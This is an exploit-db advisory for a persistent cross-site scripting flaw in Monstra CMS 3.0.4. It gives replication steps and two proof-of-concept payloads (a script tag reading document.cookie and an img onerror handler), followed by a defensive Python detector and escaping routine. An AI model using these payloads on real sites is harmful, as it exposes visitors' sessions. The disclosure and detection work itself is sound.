Monstra CMS 3.0.4 – Persistent Cross-Site Scripting

  • Author: Wenming Jiang
    Date: 2018-04-23
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/44502/
# Exploit Title: Monstra CMS 3.0.4 - Persistent Cross-Site Scripting
# Date: 2018-04-14
# Exploit Author: Wenming Jiang
# Vendor Homepage: https://github.com/monstra-cms/monstra
# Software Link: https://github.com/monstra-cms/monstra
# Version: 3.0.4
# Tested on: php 5.6, apache2.2.29, macos 10.12.6
# CVE: CVE-2018-10109

#Description:
#Monstra CMS 3.0.4 has a stored XSS vulnerability: an attacker who has access to the editor role can enter the payload
#in the content section of a new page in the blog catalog, and it is stored and rendered unescaped to every visitor.

#Steps to replicate:
#1. Log into the system with the editor role.
#2. Create a new page in the blog catalog.
#3. Navigate to the content section.
#4. Enter the payload: <script>alert(document.cookie)</script>
#5. Visit http://<your_site>/monstra/blog/<page_name>.php; the JavaScript executes in the visitor's browser.

#Exploit Code:
<script>alert(document.cookie)</script>
or
<img src=1 onerror=alert(/xss/) >
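As an added illustration (not part of the advisory and not Monstra's own code), the Python script below runs a simple detector over constructed sample page bodies containing the two payload shapes shown above and applies the output-encoding step that neutralizes them; the class and function names are my own, and the second payload is there to show why blocking only the literal `<script>` tag is not enough.

```python
"""Detect active content in stored CMS page bodies and output-encode it.

Added example, not Monstra's code. Models the two payload shapes from the
advisory: a <script> element and an inline event handler on an <img>.
"""
import html
from html.parser import HTMLParser


class ActiveContentDetector(HTMLParser):
    """Flags <script> elements, on* event-handler attributes and javascript: URLs."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append(("script-tag", tag))
        for name, value in attrs:
            lname = name.lower()
            if lname.startswith("on"):
                self.findings.append(("event-handler", f"{tag}@{lname}"))
            elif lname in ("href", "src") and value and value.strip().lower().startswith("javascript:"):
                self.findings.append(("js-url", f"{tag}@{lname}"))


def scan_content(raw_html):
    """Return (kind, location) findings for one stored page body."""
    det = ActiveContentDetector()
    det.feed(raw_html)
    det.close()
    return det.findings


def render_escaped(raw_html):
    """Output-encode the body so the browser renders it as text, not markup."""
    return html.escape(raw_html, quote=True)


# Constructed sample records: the two advisory payloads plus a benign post.
SAMPLE_PAGES = {
    "script": "<p>hello</p><script>alert(document.cookie)</script>",
    "img-onerror": "<img src=1 onerror=alert(/xss/) >",
    "benign": "<p>Release notes for <b>3.0.4</b></p>",
}

if __name__ == "__main__":
    for name, body in SAMPLE_PAGES.items():
        print(name, scan_content(body), render_escaped(body))
```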